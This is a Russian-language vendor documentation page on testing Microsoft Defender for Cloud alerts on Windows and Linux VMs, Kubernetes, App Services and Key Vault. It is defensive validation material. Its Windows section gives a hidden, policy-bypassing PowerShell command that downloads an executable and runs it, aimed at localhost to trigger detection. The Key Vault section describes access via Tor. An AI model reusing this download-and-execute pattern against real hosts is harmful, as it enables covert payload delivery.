Проверка оповещений в Microsoft Defender для облака
Статья
В этой статье объясняется, как проверить правильность настройки системы для оповещений Microsoft Defender для облака, обеспечивая эффективное отслеживание и реагирование на угрозы безопасности.
Что такое оповещения системы безопасности?
Оповещения — это уведомления, которые Defender для облака создаются при обнаружении угроз в ресурсах. Он определяет приоритеты и отображает оповещения, а также сведения, необходимые для быстрого изучения проблемы. Defender для облака также предоставляет рекомендации по исправлению атаки.
Оцените значение и возможности планов Microsoft Defender.
Проверьте все конфигурации, которые вы создали для оповещений системы безопасности (например, интеграции SIEM, автоматизации рабочих процессов и Уведомления по электронной почте).
Создание примеров оповещений:
В качестве пользователя с участником подписки роли на панели инструментов на странице оповещений системы безопасности выберите примеры оповещений.
Выберите подписку.
Выберите соответствующие планы Microsoft Defender, для которых нужно просмотреть оповещения.
Выберите Создать примеры оповещений.
Появится уведомление, позволяющее узнать, что создаются примеры оповещений:
Через несколько минут оповещения отображаются на странице оповещений системы безопасности. Они также отображаются в любом месте, где вы настроили для получения оповещений системы безопасности Microsoft Defender для облака (подключенных SIEMs, Уведомления по электронной почте и т. д.).
Совет
Эти оповещения предназначены для моделируемых ресурсов.
Имитация оповещений на виртуальных машинах Azure (Windows)
После установки агента Microsoft Defender для конечной точки на компьютере в рамках интеграции Defender для серверов выполните следующие действия с компьютера, где вы хотите быть атакованным ресурсом оповещения.
Откройте командную строку с повышенными привилегиями на устройстве и запустите сценарий:
Перейдите в раздел "Пуск " и введите cmd.
Щелкните правой кнопкой мыши командную строку и выберите "Запуск от имени администратора".
В командной строке скопируйте и выполните следующую команду: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'
Окно командной строки закрывается автоматически. В случае успешного выполнения новое оповещение должно отображаться в колонке "Оповещения Defender для облака" в течение 10 минут.
Строка сообщения в поле PowerShell должна выглядеть примерно так:
При проверке тестовых оповещений для Windows убедитесь, что у вас есть Defender для конечной точки с включенной защитой в режиме реального времени. Узнайте, как проверить эту конфигурацию.
Имитация оповещений на виртуальных машинах Azure (Linux)
После установки агента Microsoft Defender для конечной точки на компьютере в рамках интеграции Defender для серверов выполните следующие действия с компьютера, на котором вы хотите быть атакованным ресурсом оповещения:
Окно командной строки закрывается автоматически. В случае успешного выполнения новое оповещение должно отображаться в колонке "Оповещения Defender для облака" в течение 10 минут.
Примечание
При проверке тестовых оповещений для Linux убедитесь, что у вас есть Defender для конечной точки с включенной защитой в режиме реального времени. Узнайте, как проверить эту конфигурацию.
Имитация оповещений в Kubernetes
Defender для контейнеров предоставляет оповещения системы безопасности для кластеров и базовых узлов кластера. Это достигается путем мониторинга плоскости управления (сервера API) и контейнерной рабочей нагрузки.
Вы можете имитировать оповещения для плоскости управления и рабочей нагрузки с помощью средства моделирования оповещений Kubernetes.
В браузере Tor перейдите по URL-адресу SAS. Теперь вы увидите и можете скачать загруженный файл.
Тестирование оповещений AppServices
Чтобы имитировать оповещение EICAR служб приложений:
Найдите конечную точку HTTP веб-сайта, перейдя в колонку портал Azure для веб-сайта Служба приложений или используя пользовательскую запись DNS, связанную с этим веб-сайтом. (Конечная точка URL-адреса по умолчанию для веб-сайта служб приложение Azure имеет суффиксhttps://XXXXXXX.azurewebsites.net). Веб-сайт должен быть существующим веб-сайтом, а не созданным до имитации оповещений.
Найдите конечную точку HTTP веб-сайта, перейдя в колонку портал Azure для веб-сайта Служба приложений или используя пользовательскую запись DNS, связанную с этим веб-сайтом. (Конечная точка URL-адреса по умолчанию для веб-сайта служб приложение Azure имеет суффиксhttps://XXXXXXX.azurewebsites.net). Веб-сайт должен быть существующим веб-сайтом, а не созданным до имитации оповещений.
Перейдите по URL-адресу веб-сайта и добавьте следующий фиксированный суффикс: /This_Will_Generate_ASC_Alert URL-адрес должен выглядеть следующим образом: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert Для создания оповещения может потребоваться некоторое время (~1,5 часа).
Проверка обнаружения угроз Azure Key Vault
Если у вас еще нет хранилища ключей, обязательно создайте его.
После создания Key Vault и секрета перейдите к виртуальной машине с доступом к Интернету и скачайте браузер TOR.
Установите браузер TOR на виртуальной машине.
После установки откройте обычный браузер, войдите в портал Azure и перейдите на страницу Key Vault. Выберите выделенный URL-адрес и скопируйте адрес.
Откройте TOR и вставьте этот URL-адрес (для доступа к портал Azure необходимо повторно пройти проверку подлинности).
После доступа можно также выбрать параметр "Секреты" в левой области.
В браузере TOR выйдите из портал Azure и закройте браузер.
Через некоторое время Defender для Key Vault активирует оповещение с подробными сведениями об этом подозрительном действии.
Следующие шаги
В этой статье представлен процесс проверки оповещений. Теперь, когда вы знакомы с этой проверкой, изучите следующие статьи: